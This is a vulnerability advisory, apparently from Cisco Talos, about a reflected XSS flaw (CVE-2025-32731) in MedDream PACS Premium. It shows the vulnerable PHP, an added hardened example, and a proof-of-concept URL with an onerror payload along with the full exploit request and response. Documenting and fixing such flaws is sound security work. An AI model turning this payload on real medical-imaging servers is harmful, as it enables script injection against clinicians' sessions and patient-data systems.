CVE-2025-32731
A reflected cross-site scripting (XSS) vulnerability exists in the radiationDoseReport.php functionality of MedDream PACS Premium 7.3.5.860. A specially crafted malicious URL can lead to arbitrary JavaScript code execution in the victim's browser. An attacker can provide a crafted URL to a victim to trigger this vulnerability.
Tested Versions: the versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
MedDream PACS Premium 7.3.5.860
Product URLs: MedDream PACS Premium - https://meddream.com/products/meddream-pacs-server/
CVSSv3 Score: 6.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
MedDream PACS is a DICOM 3.0-compliant server for storing, managing, and retrieving medical images. It includes a web-based DICOM viewer and administration interface, with features like user access control, study forwarding, and multi-format image support.
Details: a pre-authentication reflected cross-site scripting vulnerability exists in the functionality of the Pacs/radiationDoseReport.php script. The value of the path parameter used in that script is written into the HTML output without any sanitization. The vulnerable code appears as follows:
Line 71     if (!isset($_GET['path']))
Line 72         die("Full path to the radiation dose report must be specified!");
Line 73     $dbcon = new MyConnection();
Line 74     $path = urldecode($_GET['path']);
Line 75     if (isset($_GET['verbose'])) {
Line 76         $verbose = $_GET['verbose'];
Line 77     }
Line 78     if (!file_exists($path)) {
Line 79         print "<p>File [$path] does not exist!";
Line 80         exit();
Line 81     }
The $path variable is taken directly from the request and is fully attacker-controlled (line 74). Next, if the file pointed to by $path does not exist (line 78), an error message that embeds the raw value of $path is written into the HTML response (line 79), so any markup or script in the parameter is rendered by the browser.
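The following is an added example, not code from MedDream or from the advisory: it places the vulnerable error-message pattern from lines 78-81 next to a hardened version that HTML-encodes the user-controlled value before it reaches the response. The function names, the $query array standing in for $_GET, and the self-check payload are assumptions made for illustration.

```php
<?php
// Added example (not MedDream's code): the missing-file error path of
// radiationDoseReport.php rewritten to encode the attacker-controlled
// value before it is written into HTML. Function names are hypothetical.

declare(strict_types=1);

// Vulnerable pattern, as shown in the advisory: the raw value is
// interpolated into the HTML error message. Kept only for comparison.
function renderMissingFileVulnerable(string $path): string
{
    return "<p>File [$path] does not exist!";
}

// Hardened version: htmlspecialchars() turns '<', '>', '"', "'" and '&'
// into entities, so the value can no longer open a tag or break out of an
// attribute. ENT_QUOTES covers both quote styles; the explicit charset
// avoids encoding-dependent surprises.
function renderMissingFileSafe(string $path): string
{
    $safe = htmlspecialchars($path, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>File [$safe] does not exist!</p>";
}

// Hardened handler mirroring lines 71-81 of the advisory. $query stands in
// for $_GET so the function can be exercised offline.
function handleRadiationDoseReport(array $query): string
{
    if (!isset($query['path']) || !is_string($query['path'])) {
        return "Full path to the radiation dose report must be specified!";
    }
    // $_GET is already percent-decoded by PHP; the original code's extra
    // urldecode() call decodes a second time, which is unnecessary and
    // makes filtering in front of the application harder to reason about.
    $path = $query['path'];
    if (!file_exists($path)) {
        return renderMissingFileSafe($path);
    }
    // ... report rendering would continue here (omitted) ...
    return "<p>Report found.</p>";
}

// Offline self-check with the payload quoted in the advisory (constructed input).
$payload = '<img src="#" onerror="alert(1)" />';
echo renderMissingFileVulnerable($payload), PHP_EOL;   // tag survives intact
echo renderMissingFileSafe($payload), PHP_EOL;         // rendered as literal text
echo handleRadiationDoseReport(['path' => $payload]), PHP_EOL;
```

Run with `php example.php`: the first line echoes the payload unchanged, while the safe variants print `&lt;img src=&quot;#&quot; onerror=&quot;alert(1)&quot; /&gt;`, which the browser displays as text. Output encoding at the point where untrusted data meets HTML is the fix; the response headers in the advisory (X-XSS-Protection, X-Content-Type-Options) do not prevent this class of bug.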
To trigger the vulnerability, an attacker might provide the victim with the following malicious URL:
http://127.0.0.1/Pacs/radiationDoseReport.php?path=<img src="#" onerror="alert(1)" />
URL encoded:
http://127.0.0.1/Pacs/radiationDoseReport.php?path=%3cimg%20src%3d%22%23%22%20onerror%3d%22alert(1)%22%20%2f%3e
Example of a malicious request and response containing injected HTML/JavaScript code:
REQ
GET /Pacs/radiationDoseReport.php?path=%3cimg%20src%3d%22%23%22%20onerror%3d%22alert(1)%22%20%2f%3e HTTP/1.1
Host: 192.168.155.105
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionCookie=%5C%09%C4%85%C5%8C%2Cj%D7%C0%BA%AAX%AF%E5h%EBYc%A3%EB%96E%92%20%A3%CD%CDe%1E%F9_; MEDDREAMSESSID=9CF70D2D0EE3A644BBBB1BF24385E66A; PHPSESSID=6d0c1af741ebfae0d05672ae6bf835a8
Upgrade-Insecure-Requests: 1
Priority: u=0, i
RESP
HTTP/1.1 200 OK
Date: Wed, 16 Apr 2025 15:56:19 GMT
Server: =^_^=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Powered-By: PHP/8.3.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade
Permissions-Policy: geolocation=(), microphone=(), camera=()
Content-Length: 2532
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
(...)
<head><title>MedDream PACS - Radiation Dose Report</title></head><body><div class="contentBody"><p>File [<img src="#" onerror="alert(1)" />] does not exist!</div>
Timeline:
2025-04-29 - Initial Vendor Contact
2025-04-29 - Vendor Disclosure
2025-07-28 - Vendor Patch Release
2025-07-28 - Public Release
Credit: Discovered by Marcin 'Icewall' Noga of Cisco Talos.